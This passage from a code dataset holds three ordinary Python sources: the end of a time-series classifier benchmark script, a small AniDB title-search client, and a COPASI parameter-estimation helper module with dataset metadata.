[pipeline_pst_knn, pipeline_pca_knn]:\r\n xs = from_nested_to_2d_array(train_x) \r\n clf.fit(xs,train_y)\r\n\r\n elif clf in [pipeline_act_knn]:\r\n xs = from_nested_to_2d_array(train_x)\r\n xs = np.asarray(xs, dtype='float64')\r\n x_hat = [act.fit_transform(xs[i],train_y) for i in range(len(train_x))]\r\n clf.fit(x_hat,train_y)\r\n else: \r\n clf.fit(train_x, train_y)\r\n \r\n\r\n #get the predictions for each classifier\r\n clf_preds = []\r\n for clf in clfs:\r\n if clf in [pipeline_pst_knn, pipeline_pca_knn]:\r\n xt = from_nested_to_2d_array(test_x)\r\n clf_preds.append([clf.predict(xt)])\r\n elif clf in [pipeline_act_knn]:\r\n xt = from_nested_to_2d_array(test_x)\r\n xt = np.asarray(xt, dtype='float64')\r\n x_hat = [act.transform(xt[i],test_y) for i in range(len(test_x))]\r\n clf_preds.append([clf.predict(x_hat)])\r\n else:\r\n clf_preds.append([clf.predict(test_x)])\r\n\r\n #get the accuracy score for each classifer\r\n accs = []\r\n\r\n for clf_p in clf_preds:\r\n\r\n accs.append([accuracy_score(test_y, clf_p[0])])\r\n\r\n #get the index of the best accuracy\r\n index = np.argmax(accs)\r\n\r\n #get the index of the best accuracy\r\n index = np.argmax(accs)\r\n\r\n #print(\"best classifier is:\", names[index], \" with an accuracy of: \", accs[index])\r\n np.sort(accs)\r\n data = {'classifier':names, 'accuracy':accs}\r\n data = pd.DataFrame(data)\r\n data[\"Rank\"] = len(names) - data[\"accuracy\"].rank() + 1\r\n table[f'Accuracy {k[0:10]}'] = data[\"accuracy\"]\r\n table[f'Rank {k[0:10]}'] = data[\"Rank\"]\r\na = table.iloc[:,::2]\r\na = a.iloc[: , 1:]\r\ntable['AVG Rank'] = a.mean(axis=1)\r\nprint(table)\r\n", "repo_name": "JamesMayGeo/Diss", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 5413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "sktime.__file__", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sktime.classification.distance_based.KNeighborsTimeSeriesClassifier", "line_number": 50, "usage_type": "call"}, {"api_name": "sktime.classification.distance_based.KNeighborsTimeSeriesClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PowerTransformer", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 74, "usage_type": "call"}, {"api_name": "sktime.transformations.series.acf.AutoCorrelationTransformer", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "sktime.utils.data_io.load_from_tsfile_to_dataframe", "line_number": 87, "usage_type": 
"call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sktime.utils.data_io.load_from_tsfile_to_dataframe", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 96, "usage_type": "call"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 101, "usage_type": "call"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 112, "usage_type": "call"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 136, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "20064775840", "text": "from __future__ import absolute_import\nimport os\nimport xml.etree.cElementTree as etree\nfrom datetime import datetime, timedelta\n\nfrom appdirs import *\n\nfrom .helper import download_file\nfrom .models import *\n\n__version__ = \"0.1.0\"\n__author__ = \"Dennis Lutter\"\n\nANIME_LIST_URL = \"http://anidb.net/api/anime-titles.xml.gz\"\n\nclass Anidb(object):\n\n def __init__(self, cache_dir=None, auto_download=True, lang=None):\n if not cache_dir:\n self._cache_dir = user_cache_dir(\"simpleanidb\")\n if not os.path.isdir(self._cache_dir):\n os.mkdir(self._cache_dir)\n else:\n self._cache_dir = cache_dir\n if not os.path.isdir(self._cache_dir):\n raise ValueError(\"'%s' does not exist\" % self._cache_dir)\n elif not os.access(self._cache_dir, os.W_OK):\n raise IOError(\"'%s' is not writable\" % self._cache_dir)\n\n self.anime_list_path = os.path.join(\n self._cache_dir, \"anime-titles.xml.gz\")\n self.auto_download = auto_download\n self._xml = None\n self.lang = lang\n if not lang:\n self.lang = \"en\"\n\n def search(self, term):\n if not self._xml:\n try:\n self._xml = self._read_file(self.anime_list_path)\n except IOError:\n if self.auto_download:\n self.download_anime_list()\n self._xml = self._read_file(self.anime_list_path)\n else:\n raise\n\n term = term.lower()\n anime_ids = []\n for anime in self._xml.findall(\"anime\"):\n for title in anime.findall(\"title\"):\n if term in title.text.lower():\n anime_ids.append((int(anime.get(\"aid\")), anime))\n break\n return [Anime(self, aid, False, xml_node) for aid, xml_node in anime_ids]\n\n def anime(self, aid):\n return Anime(self, aid)\n\n def _read_file(self, path):\n f = open(path, 'rb')\n return etree.ElementTree(file=f)\n\n def download_anime_list(self, force=False):\n if not force and os.path.exists(self.anime_list_path):\n modified_date = datetime.fromtimestamp(\n os.path.getmtime(self.anime_list_path))\n if modified_date + timedelta(1) > datetime.now():\n return False\n return download_file(self.anime_list_path, ANIME_LIST_URL)\n", "repo_name": "lad1337/simpleanidb", "sub_path": "simpleanidb/__init__.py", "file_name": "__init__.py", 
"file_ext": "py", "file_size_in_byte": 2413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 27, "usage_type": "call"}, {"api_name": "os.W_OK", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "xml.etree.cElementTree.ElementTree", "line_number": 63, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree", "line_number": 63, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.getmtime", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "name"}, {"api_name": "helper.download_file", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "17508869756", "text": "\"\"\"Submodule with utility methods for carrying out and plotting of parameter estimations.\n\nThe main function provided by this submodule is :func:`run_parameter_estimation`. Without any parameters, the\npreviously set up parameter estimation as stored in the file will be carried out. And the parameters found will\nbe returned.\n\nIt is also possible to set up parameter estimation problems from scratch. To make it as simple as possible, pandas\ndata frames are used, the mapping from the columns to the model element will be done implicitly by naming the\ncolumns like the corresponding model elements.\n\nExample:\n\n >>> from basico import *\n >>> m = model_io.load_example(\"LM-test1\")\n >>> print(get_fit_parameters())\n >>> print(get_parameters_solution())\n >>> run_parameter_estimation(method='Levenberg - Marquardt')\n >>> print(get_parameters_solution())\n\n\"\"\"\n\nimport pandas\nimport COPASI\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport logging\n\nAFFECTED_EXPERIMENTS = 'Affected Experiments'\nTASK_PARAMETER_ESTIMATION = 'Parameter Estimation'\n\ntry:\n from . 
import model_io\nexcept ValueError:\n import model_io\n\ntry:\n from builtins import ValueError\nexcept ImportError:\n pass\n\n\ndef num_experiment_files(**kwargs):\n \"\"\"Return the number of experiment files defined.\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: number of experiment files\n :rtype: int\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n return problem.getExperimentSet().size()\n\n\ndef get_experiment_names(**kwargs):\n \"\"\"Returns the list of experiment names\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: list of experiment names defined\n :rtype: [str]\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n result = []\n for i in range(problem.getExperimentSet().size()):\n experiment = problem.getExperimentSet().getExperiment(i)\n result.append(experiment.getObjectName())\n return result\n\n\ndef _get_experiment_keys(**kwargs):\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n result = []\n for i in range(problem.getExperimentSet().size()):\n experiment = problem.getExperimentSet().getExperiment(i)\n result.append(experiment.getKey())\n return result\n\n\ndef num_validations_files(**kwargs):\n \"\"\"Returns the number of cross validation experiment files\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: number of cross validation experiment files\n :rtype: int\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n return problem.getCrossValidationSet().size()\n\n\ndef _role_to_string(role):\n names = {\n COPASI.CExperiment.time: 'time',\n COPASI.CExperiment.ignore: 'ignored',\n COPASI.CExperiment.independent: 'independent',\n COPASI.CExperiment.dependent: 'dependent',\n }\n return names.get(role, COPASI.CExperiment.ignore)\n\n\ndef get_experiment(experiment, **kwargs):\n \"\"\"Returns the specified experiment.\n\n :param experiment: experiment name or index\n :type experiment: int or str or COPASI.CExperiment\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: the experiment or an error if none existent\n \"\"\"\n if not isinstance(experiment, COPASI.CExperiment):\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, 
COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n exp_set = problem.getExperimentSet()\n\n if type(experiment) is int and experiment >= exp_set.size():\n raise ValueError('Experiment index out of bounds')\n exp = exp_set.getExperiment(experiment)\n if exp is not None:\n experiment = exp\n else:\n raise ValueError('No experiment for: {0}'.format(experiment))\n return experiment\n\n\ndef get_experiment_mapping(experiment, **kwargs):\n \"\"\"Retrieves a data frame of the experiment mapping.\n\n The resulting data frame will have the columns:\n * `column` (int): index of the column in the file\n * `type` (str): 'time', 'dependent', 'indepenent' or 'ignored'\n * 'mapping' (str): the name of the element it is mapped to\n * 'cn' (str): internal identifier\n\n :param experiment: the experiment to get the mapping from\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: data frame with the mapping as described\n :rtype: pandas.DataFrame\n \"\"\"\n experiment = get_experiment(experiment, **kwargs)\n\n obj_map = experiment.getObjectMap()\n rows = []\n for i in range(obj_map.getLastColumn() + 1):\n role = obj_map.getRole(i)\n cn = obj_map.getObjectCN(i)\n obj = ''\n if cn:\n obj = experiment.getObjectDataModel().getObject(COPASI.CCommonName(cn))\n if obj:\n obj = obj.getObjectDisplayName()\n\n rows.append({\n 'column': i,\n 'type': _role_to_string(role),\n 'mapping': obj,\n 'cn': cn,\n })\n\n return pandas.DataFrame(data=rows).set_index('column')\n\n\ndef _get_experiment_file(experiment):\n file_name_only = experiment.getFileNameOnly()\n model = experiment.getObjectDataModel()\n directory = os.path.dirname(model.getFileName())\n\n if os.path.exists(os.path.join(directory, file_name_only)):\n return os.path.join(directory, file_name_only)\n\n if os.path.exists(file_name_only):\n return file_name_only\n\n file_name = experiment.getFileName()\n if os.path.exists(file_name):\n return file_name\n\n raise ValueError('Experiment file {0} does not exist'.format(file_name_only))\n\n\ndef get_data_from_experiment(experiment, **kwargs):\n \"\"\"Returns the data of the given experiment as dataframe\n\n :param experiment: the experiment\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n - | `rename_headers` (bool): if true (default) the columns of the headers will be renamed\n | with the names of the element it is mapped to. 
Also all ignored columns will be removed from the\n | dataset\n\n :return: dataframe with experimental data\n :rtype: pandas.DataFrame\n \"\"\"\n experiment = get_experiment(experiment, **kwargs)\n experiment_file = _get_experiment_file(experiment)\n num_lines = sum(1 for line in open(experiment_file))\n header_row = experiment.getHeaderRow()\n have_headers = header_row < num_lines\n skip_idx = [x-1 for x in range(1, num_lines+1) if\n not (experiment.getFirstRow() <= x <= experiment.getLastRow())]\n\n if 'rename_headers' in kwargs:\n rename_headers = kwargs['rename_headers']\n else:\n rename_headers = True\n\n if have_headers and rename_headers:\n skip_idx.insert(0, header_row-1)\n\n drop_cols = []\n headers = {}\n obj_map = experiment.getObjectMap()\n if rename_headers:\n count = 0\n for i in range(obj_map.size()):\n role = obj_map.getRole(i)\n\n if role == COPASI.CExperiment.time:\n headers[count] = 'Time'\n count += 1\n\n elif role == COPASI.CExperiment.ignore:\n drop_cols.append(i)\n\n else:\n cn = obj_map.getObjectCN(i)\n obj = experiment.getObjectDataModel().getObject(COPASI.CCommonName(cn))\n if obj:\n headers[count] = obj.getObjectDisplayName()\n count += 1\n else:\n drop_cols.append(i)\n\n if rename_headers or not have_headers:\n df = pandas.read_csv(experiment_file,\n sep=experiment.getSeparator(),\n header=None,\n skiprows=skip_idx)\n else:\n df = pandas.read_csv(experiment_file,\n sep=experiment.getSeparator(),\n skiprows=skip_idx)\n\n if not rename_headers:\n return df\n\n all_columns = list(df.columns)\n for i in range(obj_map.size(), len(all_columns)):\n # drop additional columns not mapped\n drop_cols.append(all_columns[i])\n\n if any(drop_cols):\n df.drop(drop_cols, axis=1, inplace=True)\n\n df.rename(columns=headers, inplace=True)\n\n return df\n\n\ndef get_experiment_data_from_model(model=None):\n \"\"\"Returns all experimental data from the model\n\n :param model: the model to get the data from\n :type model: COPASI.CDataModel or None\n :return: list of dataframes with experimental data (with columns renamed and unmapped columns dropped)\n :rtype: [pandas.DataFrame]\n \"\"\"\n if model is None:\n model = model_io.get_current_model()\n result = []\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n for i in range(num_experiments):\n experiment = experiments.getExperiment(i)\n df = get_data_from_experiment(experiment, rename_headers=True)\n result.append(df)\n\n return result\n\n\ndef get_fit_item_template(include_local=False, include_global=False, default_lb=0.001, default_ub=1000, model=None):\n \"\"\"Returns a template list of items to be used for the parameter estimation\n\n :param include_local: boolean, indicating whether to include local parameters\n :type include_local: bool\n\n :param include_global: boolean indicating whether to include global parameters\n :type include_global: bool\n\n :param default_lb: default lower bound to be used\n :type default_lb: float\n\n :param default_ub: default upper bound to be used\n :type default_ub: float\n\n :param model: the model or None\n :type model: COPASI.CDataModel or None\n\n :return: List of dictionaries, with the local / global parameters in the format needed by:\n 
:func:`set_fit_parameters`.\n :rtype: [{}]\n \"\"\"\n\n if model is None:\n model = model_io.get_current_model()\n\n result = []\n\n if include_global:\n\n for mv in model.getModel().getModelValues():\n result.append({\n 'name': mv.getObjectDisplayName(),\n 'lower': default_lb,\n 'upper': default_ub\n })\n\n if include_local:\n\n from . import model_info\n local_params = model_info.get_reaction_parameters().reset_index()\n for name, local in zip(local_params['name'], local_params['type']):\n\n if local == 'local':\n result.append({\n 'name': name,\n 'lower': default_lb,\n 'upper': default_ub\n })\n\n return result\n\n\ndef get_fit_parameters(model=None):\n \"\"\"Returns a data frame with all fit parameters\n\n The resulting dataframe will have the following columns:\n\n * `name`: the name of the fit parameter\n * `lower`: the lower bound of the parameter\n * `upper`: the upper bound of the parameter\n * `start`: the start value\n * | `affected`: a list of all experiments (names) the fit parameter should apply to. If empty the parameter should\n | be varied for all experiments.\n * `cn`: internal identifier\n\n :param model: the model to get the fit parameters from\n :type model: COPASI.CDataModel or None\n\n :return: data frame with the fit parameters\n :rtype: pandas.DataFrame\n \"\"\"\n if model is None:\n model = model_io.get_current_model()\n\n pe_task = model.getTask(TASK_PARAMETER_ESTIMATION)\n problem = pe_task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n items = problem.getOptItemList()\n data = []\n\n for i in range(len(items)):\n item = items[i]\n obj = model.getObject(COPASI.CCommonName(item.getObjectCN())).toObject().getObjectParent()\n name = obj.getObjectDisplayName()\n data.append({\n 'name': name,\n 'lower': item.getLowerBound(),\n 'upper': item.getUpperBound(),\n 'start': item.getStartValue(),\n 'affected': _get_affected_experiments(item),\n 'cn': item.getObjectCN(),\n })\n\n if not data:\n return None\n\n return pandas.DataFrame(data=data).set_index('name')\n\n\ndef set_fit_parameters(fit_parameters, model=None):\n \"\"\"Replaces all existing fit items with the ones provided\n\n :param fit_parameters: the fit parameters as pandas data frame of list of dictionaries with keys:\n\n * 'name' str: the display name of the model element to map the column to.\n * 'lower': the lower bound of the parameter\n * 'upper': the upper bound of the parameter\n * 'start' (float, optional): the start value\n * 'cn' (str, optional): internal identifier\n\n :type fit_parameters: pandas.DataFrame or [{}]\n :param model: the model or None\n :type model: COPASI.CDataModel or None\n :return: None\n \"\"\"\n # type: (pandas.DataFrame, COPASI.CDataModel)\n if model is None:\n model = model_io.get_current_model()\n\n if type(fit_parameters) is list:\n fit_parameters = pandas.DataFrame(data=fit_parameters)\n\n pe_task = model.getTask(TASK_PARAMETER_ESTIMATION)\n problem = pe_task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n while problem.getOptItemSize() > 0:\n problem.removeOptItem(0)\n\n for i in range(len(fit_parameters)):\n item = fit_parameters.iloc[i]\n cn = None\n name = None\n\n if 'cn' in item:\n cn = COPASI.CCommonName(item.cn)\n\n if 'name' in item:\n name = item['name']\n if not cn:\n obj = model.findObjectByDisplayName(name)\n if obj:\n cn = obj.getCN()\n if _get_role_for_reference(obj.getObjectName()) == COPASI.CExperiment.ignore:\n cn = obj.getValueReference().getCN()\n\n if not cn:\n logging.warning('object {0} not found'.format(name))\n 
continue\n\n fit_item = problem.addFitItem(cn)\n assert (isinstance(fit_item, COPASI.CFitItem))\n if 'lower' in item:\n fit_item.setLowerBound(COPASI.CCommonName(str(item['lower'])))\n if 'upper' in item:\n fit_item.setUpperBound(COPASI.CCommonName(str(item['upper'])))\n if 'start' in item:\n fit_item.setStartValue(float(item['start']))\n\n\ndef _get_name_for_key(key):\n factory = COPASI.CRootContainer.getKeyFactory()\n obj = factory.get(key)\n if not obj:\n return ''\n return obj.getObjectName()\n\n\ndef _get_affected_experiments(optitem):\n # type: (COPASI.CCopasiParameterGroup) -> [str]\n result = []\n affected = optitem.getGroup(AFFECTED_EXPERIMENTS)\n assert (isinstance(affected, COPASI.CCopasiParameterGroup))\n for i in range(affected.size()):\n current = affected.getParameter(i)\n result.append(_get_name_for_key(current.getStringValue()))\n return result\n\n\ndef get_parameters_solution(model=None):\n \"\"\"Returns the solution found for the fit parameters as data frame\n\n The resulting data frame will have the columns:\n\n * `name`: the name of the parameter\n * `lower`: the parameters lower bound\n * `upper`: the parameters upper bound\n * `sol`: the solution found in the last run (or NaN, if not run yet, or no solution found)\n * `affected`: the experiments this parameter applies to (or an empty list if it applies to all)\n\n :param model: the model to use, or None\n :type model: COPASI.CDataModel or None\n :return: data frame as described\n :rtype: pandas.DataFrame\n \"\"\"\n if model is None:\n model = model_io.get_current_model()\n pe_task = model.getTask(TASK_PARAMETER_ESTIMATION)\n problem = pe_task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n solution = problem.getSolutionVariables()\n items = problem.getOptItemList()\n assert(solution.size() == len(items))\n data = []\n\n for i in range(solution.size()):\n item = items[i]\n sol = solution.get(i)\n obj = model.getObject(COPASI.CCommonName(item.getObjectCN())).toObject().getObjectParent()\n name = obj.getObjectDisplayName()\n data.append({\n 'name': name,\n 'lower': item.getLowerBound(),\n 'upper': item.getUpperBound(),\n 'sol': sol,\n 'affected': _get_affected_experiments(item),\n })\n\n if not data:\n return None\n\n return pandas.DataFrame(data=data).set_index('name')\n\n\ndef _get_role_for_reference(reference_name):\n role_map = {\n 'Concentration': COPASI.CExperiment.dependent,\n 'ParticleNumber': COPASI.CExperiment.dependent,\n 'ParticleNumberRate': COPASI.CExperiment.dependent,\n 'InitialConcentration': COPASI.CExperiment.independent,\n 'InitialParticleNumber': COPASI.CExperiment.independent,\n 'InitialValue': COPASI.CExperiment.independent,\n 'InitialVolume': COPASI.CExperiment.independent,\n 'Rate': COPASI.CExperiment.dependent,\n 'Value': COPASI.CExperiment.dependent,\n 'Volume': COPASI.CExperiment.dependent,\n }\n return role_map.get(reference_name, COPASI.CExperiment.ignore)\n\n\ndef add_experiment(name, data, **kwargs):\n \"\"\"Adds a new experiment to the model.\n\n This method adds a new experiment file to the parameter estimation task. The provided\n data frame will be written into the current directory as `experiment_name.txt` unless a filename\n has been provided.\n\n The mapping between the columns and the model elements should be done by having the columns of the data\n frame be model element names in question. So for example `[A]` to note that the transient concentrations\n of a species `A` is to be mapped as dependent variable. 
or `[A]_0` to note that the initial concentration of\n a species `A` is to be mapped as independent variable.\n\n :param name: the name of the experiment\n :type name: str\n :param data: the data frame with the experimental data\n :type data: pandas.DataFrame\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n - | `file_name` (str): the file name to save the experimental data to (otherwise it will be name.txt)\n\n :return: the filename of the generated data file\n :rtype: str\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n exp_set = problem.getExperimentSet()\n assert (isinstance(exp_set, COPASI.CExperimentSet))\n exp = exp_set.getExperiment(name)\n if exp is not None:\n logging.error('An experiment with the name {0} already exists'.format(name))\n return None\n\n # save data as tsv\n\n file_name = os.path.abspath(os.path.join(os.path.curdir, name + '.txt'))\n if 'file_name' in kwargs:\n file_name = kwargs['file_name']\n\n assert (isinstance(data, pd.DataFrame))\n data.to_csv(file_name, sep='\\t', header=True, index=False)\n # create experiment\n\n exp = COPASI.CExperiment(model)\n exp = exp_set.addExperiment(exp)\n info = COPASI.CExperimentFileInfo(exp_set)\n info.setFileName(file_name)\n info.sync()\n exp.setObjectName(name)\n exp.setFileName(file_name)\n exp.setHeaderRow(1)\n exp.setFirstRow(1)\n exp.setLastRow(len(data)+1)\n\n columns = data.columns.to_list()\n if 'time' in [col.lower() for col in columns]:\n exp.setExperimentType(COPASI.CTaskEnum.Task_timeCourse)\n else:\n exp.setExperimentType(COPASI.CTaskEnum.Task_steadyState)\n\n obj_map = exp.getObjectMap()\n num_cols = len(columns)\n obj_map.setNumCols(num_cols)\n for i in range(num_cols):\n role = COPASI.CExperiment.ignore\n current = columns[i]\n if current.lower() == 'time':\n role = COPASI.CExperiment.time\n else:\n obj = model.findObjectByDisplayName(current)\n if obj is None:\n logging.warning(\"Can't find model element for {0}\".format(current))\n else:\n role = _get_role_for_reference(obj.getObjectName())\n obj_map.setObjectCN(i, obj.getCN())\n obj_map.setRole(i, role)\n\n exp.calculateWeights()\n exp_set.compile(model.getModel().getMathContainer())\n\n return file_name\n\n\ndef run_parameter_estimation(**kwargs):\n \"\"\"Runs the parameter estimation task as specified:\n\n The following are valid methods to be used for the parameter estimation task.\n\n Current Solution:\n\n * `Current Solution Statistics`,\n\n Global Methods:\n\n * `Random Search`,\n * `Simulated Annealing`,\n * `Differential Evolution`,\n * `Scatter Search`,\n * `Genetic Algorithm`,\n * `Evolutionary Programming`,\n * `Genetic Algorithm SR`,\n * `Evolution Strategy (SRES)`,\n * `Particle Swarm`,\n\n Local Methods:\n\n * `Levenberg - Marquardt`,\n * `Hooke & Jeeves`,\n * `Nelder - Mead`,\n * `Steepest Descent`,\n * `NL2SOL`,\n * `Praxis`,\n * `Truncated Newton`,\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n - | `method` (str): one of the strings from above\n\n - | `randomize_start_values` (bool): if true, parameters will be randomized before starting otherwise the\n | parameters starting value will be 
taken.\n\n - | `calculate_statistics` (bool): if true, the statistics will be calculated at the end of the task\n\n - | `create_parametersets` (bool): if true, parameter sets will be created for all experiments\n\n - `use_initial_values` (bool): whether to use initial values\n\n - `scheduled` (bool): sets whether the task is scheduled or not\n\n - `update_model` (bool): sets whether the model should be updated, or reset to initial conditions.\n\n :return: the solution for the fit parameters see :func:`get_get_parameters_solution`.\n :rtype: pandas.DataFrame\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n if 'scheduled' in kwargs:\n task.setScheduled(kwargs['scheduled'])\n\n if 'update_model' in kwargs:\n task.setUpdateModel(kwargs['update_model'])\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n old_create_parameter_sets = problem.getCreateParameterSets()\n # old_calculate_statistics = problem.getCalculateStatistics()\n # old_randomize_start_values = problem.getRandomizeStartValues()\n\n problem.setCreateParameterSets(True)\n\n if 'method' in kwargs:\n method = kwargs['method']\n if isinstance(method, int):\n task.setMethodType(method)\n else:\n task.setMethodType(COPASI.CCopasiMethod_TypeNameToEnum(method))\n\n if 'randomize_start_values' in kwargs:\n problem.setRandomizeStartValues(bool(kwargs['randomize_start_values']))\n\n if 'calculate_statistics' in kwargs:\n problem.setCalculateStatistics(bool(kwargs['calculate_statistics']))\n\n if 'create_parametersets' in kwargs:\n problem.setCreateParameterSets(bool(kwargs['create_parametersets']))\n\n use_initial_values = kwargs.get('use_initial_values', True)\n\n result = task.initializeRaw(COPASI.CCopasiTask.OUTPUT_UI)\n if not result:\n logging.error(\"Error while initializing the simulation: \" +\n COPASI.CCopasiMessage.getLastMessage().getText())\n else:\n result = task.processRaw(use_initial_values)\n if not result:\n logging.error(\"Error while running the simulation: \" +\n COPASI.CCopasiMessage.getLastMessage().getText())\n\n problem.setCreateParameterSets(old_create_parameter_sets)\n\n return get_parameters_solution(model)\n\n\ndef get_simulation_results(**kwargs):\n \"\"\"Runs the current solution statistics and returns result of simulation and experimental data\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: tuple of lists of experiment data, and a list of simulation data\n :rtype: ([pandas.DataFrame],[pandas.DataFrame])\n \"\"\"\n import basico\n dm = kwargs.get('model', model_io.get_current_model())\n\n task = dm.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert 